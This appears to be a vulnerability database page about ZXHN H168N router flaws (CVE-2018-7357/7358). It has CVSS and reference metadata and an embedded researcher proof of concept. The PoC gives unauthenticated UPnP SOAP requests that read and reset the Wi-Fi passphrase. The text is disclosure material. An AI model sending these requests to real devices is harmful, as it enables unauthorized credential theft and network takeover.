Search

Find a vulnerability

Search criteria

    11 vulnerabilities found for ZXHN H168N by ZTE

    VAR-201811-0983

    Vulnerability from variot - Updated: 2024-11-23 22:30

    ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper access control vulnerability, which may allow an unauthorized user to gain unauthorized access. ZTE ZXHN H168N The product contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ZTE ZXHN H168N is prone to an authorization-bypass vulnerability. ZTE ZXHN H168N versions 2.2.0_PK1.2T5, 2.2.0_PK1.2T2, 2.2.0_PK11T7 and 2.2.0_PK11T are vulnerable. ZTE ZXHN H168N is a wireless VDSL router of China ZTE Corporation (ZTE). The following versions are affected: ZTE ZXHN H168N V2.2.0_PK1.2T5 version, V2.2.0_PK1.2T2 version, V2.2.0_PK11T7 version, V2.2.0_PK11T version. [*] POC: (CVE-2018-7357 and CVE-2018-7358)

    Disclaimer: [This POC is for Educational Purposes , I would Not be

    responsible for any misuse of the information mentioned in this blog post]

    [+] Unauthenticated

    [+] Author: Usman Saeed (usman [at] xc0re.net)

    [+] Protocol: UPnP

    [+] Affected Harware/Software:

    Model name: ZXHN H168N v2.2

    Build Timestamp: 20171127193202

    Software Version: V2.2.0_PK1.2T5

    [+] Findings:

    1. Unauthenticated access to WLAN password:

    POST /control/igd/wlanc_1_1 HTTP/1.1

    Host: :52869

    User-Agent: {omitted}

    Content-Length: 288

    Connection: close

    Content-Type: text/xml; charset="utf-8"

    SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys" 1

    1. Unauthenticated WLAN passphrase change:

    POST /control/igd/wlanc_1_1 HTTP/1.1

    Host: :52869

    User-Agent: {omitted}

    Content-Length: 496

    Connection: close

    Content-Type: text/xml; charset="utf-8"

    SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"

    {omitted}{omitted}{omitted}{omitted}{omitted}{omitted}

    [*] Solution:

    UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.

    [*] Note:

    There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.

    [+] Responsible Disclosure:

    Vulnerabilities identified - 20 August, 2018

    Reported to ZTE - 28 August, 2018

    ZTE official statement - 17 September 2018

    ZTE patched the vulnerability - 12 November 2018

    The operator pushed the update - 12 November 2018

    CVE published - CVE- 2018-7357 and CVE-2018-7358

    Public disclosure - 12 November 2018

    Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201811-0983",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "zxhn h168n",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "zte",
            "version": "2.2.0_pk1.2t2"
          },
          {
            "model": "zxhn h168n",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "zte",
            "version": "2.2.0_pk1.2t5"
          },
          {
            "model": "zxhn h168n",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "zte",
            "version": "2.2.0_pk11t"
          },
          {
            "model": "zxhn h168n",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "zte",
            "version": "2.2.0_pk11t7"
          },
          {
            "model": "zxhn h168n 2.2.0 pk11t7",
            "scope": null,
            "trust": 0.3,
            "vendor": "zte",
            "version": null
          },
          {
            "model": "zxhn h168n 2.2.0 pk11t",
            "scope": null,
            "trust": 0.3,
            "vendor": "zte",
            "version": null
          },
          {
            "model": "zxhn h168n 2.2.0 pk1.2t5",
            "scope": null,
            "trust": 0.3,
            "vendor": "zte",
            "version": null
          },
          {
            "model": "zxhn h168n 2.2.0 pk1.2t2",
            "scope": null,
            "trust": 0.3,
            "vendor": "zte",
            "version": null
          },
          {
            "model": "zxhn h168n 2.2.0 pk1.2t6",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "zte",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "105983"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012682"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-444"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7357"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:zte:zxhn_h168n_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012682"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Usman Saeed",
        "sources": [
          {
            "db": "BID",
            "id": "105983"
          },
          {
            "db": "PACKETSTORM",
            "id": "150728"
          }
        ],
        "trust": 0.4
      },
      "cve": "CVE-2018-7357",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 3.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 6.5,
                "id": "CVE-2018-7357",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "LOW",
                "trust": 1.8,
                "vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 3.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 6.5,
                "id": "VHN-137389",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "LOW",
                "trust": 0.1,
                "vectorString": "AV:A/AC:L/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2018-7357",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "psirt@zte.com.cn",
                "availabilityImpact": "NONE",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2018-7357",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-7357",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "psirt@zte.com.cn",
                "id": "CVE-2018-7357",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-7357",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201811-444",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-137389",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137389"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012682"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-444"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7357"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7357"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper access control vulnerability, which may allow an unauthorized user to gain unauthorized access. ZTE ZXHN H168N The product contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ZTE ZXHN H168N is prone to an authorization-bypass vulnerability. \nZTE ZXHN H168N versions 2.2.0_PK1.2T5, 2.2.0_PK1.2T2, 2.2.0_PK11T7 and 2.2.0_PK11T are vulnerable. ZTE ZXHN H168N is a wireless VDSL router of China ZTE Corporation (ZTE). The following versions are affected: ZTE ZXHN H168N V2.2.0_PK1.2T5 version, V2.2.0_PK1.2T2 version, V2.2.0_PK11T7 version, V2.2.0_PK11T version. [*] POC: (CVE-2018-7357 and CVE-2018-7358)\n\n\n\n\nDisclaimer: [This POC is for Educational Purposes , I would Not be\n\n\nresponsible for any misuse of the information mentioned in this blog post]\n\n\n\n\n[+] Unauthenticated\n\n\n\n\n[+] Author: Usman Saeed (usman [at] xc0re.net)\n\n\n\n\n[+] Protocol: UPnP\n\n\n\n\n[+] Affected Harware/Software:\n\n\n\n\nModel name: ZXHN H168N v2.2\n\n\n\n\nBuild Timestamp: 20171127193202\n\n\n\n\nSoftware Version: V2.2.0_PK1.2T5\n\n\n\n\n[+] Findings:\n\n\n\n\n1. Unauthenticated access to WLAN password:\n\n\n\n\nPOST /control/igd/wlanc_1_1 HTTP/1.1\n\n\nHost: \u003cIP\u003e:52869\n\n\nUser-Agent: {omitted}\n\n\nContent-Length: 288\n\n\nConnection: close\n\n\nContent-Type: text/xml; charset=\"utf-8\"\n\n\nSOAPACTION: \"urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys\" 1\n\n\n\n\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n\n\n\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\"\u003e\u003c/u:GetSecurityKeys\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\n\n\n\n\n2. Unauthenticated WLAN passphrase change:\n\n\n\n\nPOST /control/igd/wlanc_1_1 HTTP/1.1\n\n\nHost: \u003cIP\u003e:52869\n\n\nUser-Agent: {omitted}\n\n\nContent-Length: 496\n\n\nConnection: close\n\n\nContent-Type: text/xml; charset=\"utf-8\"\n\n\nSOAPACTION: \"urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys\"\n\n\n\n\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n\n\n\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:SetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\"\u003e\u003cNewWEPKey0\u003e{omitted}\u003c/NewWEPKey0\u003e\u003cNewWEPKey1\u003e{omitted}\u003c/NewWEPKey1\u003e\u003cNewWEPKey2\u003e{omitted}\u003c/NewWEPKey2\u003e\u003cNewWEPKey3\u003e{omitted}\u003c/NewWEPKey3\u003e\u003cNewPreSharedKey\u003e{omitted}\u003c/NewPreSharedKey\u003e\u003cNewKeyPassphrase\u003e{omitted}\u003c/NewKeyPassphrase\u003e\u003c/u:SetSecurityKeys\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\n\n\n\n\n[*] Solution:\n\n\n\n\nUPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices. \n\n\n\n\n[*] Note:\n\n\n\n\nThere are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same. \n\n\n\n\n[+] Responsible Disclosure:\n\n\n\n\nVulnerabilities identified - 20 August, 2018\n\n\n\n\nReported to ZTE - 28 August, 2018\n\n\n\n\nZTE official statement - 17 September 2018\n\n\n\n\nZTE patched the vulnerability - 12 November 2018\n\n\n\n\nThe operator pushed the update - 12 November 2018\n\n\n\n\nCVE published - CVE- 2018-7357 and CVE-2018-7358\n\n\n\n\nPublic disclosure - 12 November 2018\n\n\n\n\nRef: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522\n\n\n\n\n\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-7357"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012682"
          },
          {
            "db": "BID",
            "id": "105983"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137389"
          },
          {
            "db": "PACKETSTORM",
            "id": "150728"
          }
        ],
        "trust": 2.07
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-7357",
            "trust": 2.9
          },
          {
            "db": "ZTE",
            "id": "1009523",
            "trust": 2.0
          },
          {
            "db": "EXPLOIT-DB",
            "id": "45972",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012682",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-444",
            "trust": 0.7
          },
          {
            "db": "BID",
            "id": "105983",
            "trust": 0.3
          },
          {
            "db": "PACKETSTORM",
            "id": "150728",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-137389",
            "trust": 0.1
          },
          {
            "db": "ZTE",
            "id": "1009522",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137389"
          },
          {
            "db": "BID",
            "id": "105983"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012682"
          },
          {
            "db": "PACKETSTORM",
            "id": "150728"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-444"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7357"
          }
        ]
      },
      "id": "VAR-201811-0983",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137389"
          }
        ],
        "trust": 0.47662336000000005
      },
      "last_update_date": "2024-11-23T22:30:10.977000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Improper Authorization Vulnerabilities in ZTE ZXHN H168N Product",
            "trust": 0.8,
            "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
          },
          {
            "title": "ZTE ZXHN H168N Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=86847"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012682"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-444"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-306",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-255",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137389"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012682"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7357"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.0,
            "url": "http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009523"
          },
          {
            "trust": 1.7,
            "url": "https://www.exploit-db.com/exploits/45972/"
          },
          {
            "trust": 0.9,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7357"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7357"
          },
          {
            "trust": 0.3,
            "url": "http://www.zte.com.cn/"
          },
          {
            "trust": 0.1,
            "url": "http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009522"
          },
          {
            "trust": 0.1,
            "url": "http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:body\u003e\u003cu:getsecuritykeys"
          },
          {
            "trust": 0.1,
            "url": "http://schemas.xmlsoap.org/soap/envelope/\""
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7358"
          },
          {
            "trust": 0.1,
            "url": "http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:body\u003e\u003cu:setsecuritykeys"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137389"
          },
          {
            "db": "BID",
            "id": "105983"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012682"
          },
          {
            "db": "PACKETSTORM",
            "id": "150728"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-444"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7357"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-137389"
          },
          {
            "db": "BID",
            "id": "105983"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012682"
          },
          {
            "db": "PACKETSTORM",
            "id": "150728"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-444"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7357"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-11-14T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137389"
          },
          {
            "date": "2018-09-17T00:00:00",
            "db": "BID",
            "id": "105983"
          },
          {
            "date": "2019-02-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-012682"
          },
          {
            "date": "2018-12-11T01:49:45",
            "db": "PACKETSTORM",
            "id": "150728"
          },
          {
            "date": "2018-11-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201811-444"
          },
          {
            "date": "2018-11-14T15:29:02.187000",
            "db": "NVD",
            "id": "CVE-2018-7357"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137389"
          },
          {
            "date": "2018-09-17T00:00:00",
            "db": "BID",
            "id": "105983"
          },
          {
            "date": "2019-02-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-012682"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201811-444"
          },
          {
            "date": "2024-11-21T04:12:03.790000",
            "db": "NVD",
            "id": "CVE-2018-7357"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote or local",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-444"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ZTE ZXHN H168N Vulnerabilities related to certificate and password management in products",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-012682"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "access control error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201811-444"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201811-0984

    Vulnerability from variot - Updated: 2024-11-23 22:30

    ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations. ZTE ZXHN H168N The product contains authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ZTE ZXHN H168N is prone to an authorization-bypass vulnerability. ZTE ZXHN H168N versions 2.2.0_PK1.2T5, 2.2.0_PK1.2T2, 2.2.0_PK11T7 and 2.2.0_PK11T are vulnerable. ZTE ZXHN H168N is China's ZTE Corporation ( ZTE ) company’s a wireless VDSL router. ZTE ZXHN H168N There are security holes in . The following versions are affected: ZTE ZXHN H168N V2.2.0_PK1.2T5 Version, V2.2.0_PK1.2T2 Version, V2.2.0_PK11T7 Version, V2.2.0_PK11T Version. [*] POC: (CVE-2018-7357 and CVE-2018-7358)

    Disclaimer: [This POC is for Educational Purposes , I would Not be

    responsible for any misuse of the information mentioned in this blog post]

    [+] Unauthenticated

    [+] Author: Usman Saeed (usman [at] xc0re.net)

    [+] Protocol: UPnP

    [+] Affected Harware/Software:

    Model name: ZXHN H168N v2.2

    Build Timestamp: 20171127193202

    Software Version: V2.2.0_PK1.2T5

    [+] Findings:

    1. Unauthenticated access to WLAN password:

    POST /control/igd/wlanc_1_1 HTTP/1.1

    Host: :52869

    User-Agent: {omitted}

    Content-Length: 288

    Connection: close

    Content-Type: text/xml; charset="utf-8"

    SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys" 1

    1. Unauthenticated WLAN passphrase change:

    POST /control/igd/wlanc_1_1 HTTP/1.1

    Host: :52869

    User-Agent: {omitted}

    Content-Length: 496

    Connection: close

    Content-Type: text/xml; charset="utf-8"

    SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"

    {omitted}{omitted}{omitted}{omitted}{omitted}{omitted}

    [*] Solution:

    UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.

    [*] Note:

    There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.

    [+] Responsible Disclosure:

    Vulnerabilities identified - 20 August, 2018

    Reported to ZTE - 28 August, 2018

    ZTE official statement - 17 September 2018

    ZTE patched the vulnerability - 12 November 2018

    The operator pushed the update - 12 November 2018

    CVE published - CVE- 2018-7357 and CVE-2018-7358

    Public disclosure - 12 November 2018

    Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201811-0984",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "zxhn h168n",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "zte",
            "version": "2.2.0_pk1.2t2"
          },
          {
            "model": "zxhn h168n",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "zte",
            "version": "2.2.0_pk1.2t5"
          },
          {
            "model": "zxhn h168n",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "zte",
            "version": "2.2.0_pk11t"
          },
          {
            "model": "zxhn h168n",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "zte",
            "version": "2.2.0_pk11t7"
          },
          {
            "model": "zxhn h168n 2.2.0 pk11t7",
            "scope": null,
            "trust": 0.3,
            "vendor": "zte",
            "version": null
          },
          {
            "model": "zxhn h168n 2.2.0 pk11t",
            "scope": null,
            "trust": 0.3,
            "vendor": "zte",
            "version": null
          },
          {
            "model": "zxhn h168n 2.2.0 pk1.2t5",
            "scope": null,
            "trust": 0.3,
            "vendor": "zte",
            "version": null
          },
          {
            "model": "zxhn h168n 2.2.0 pk1.2t2",
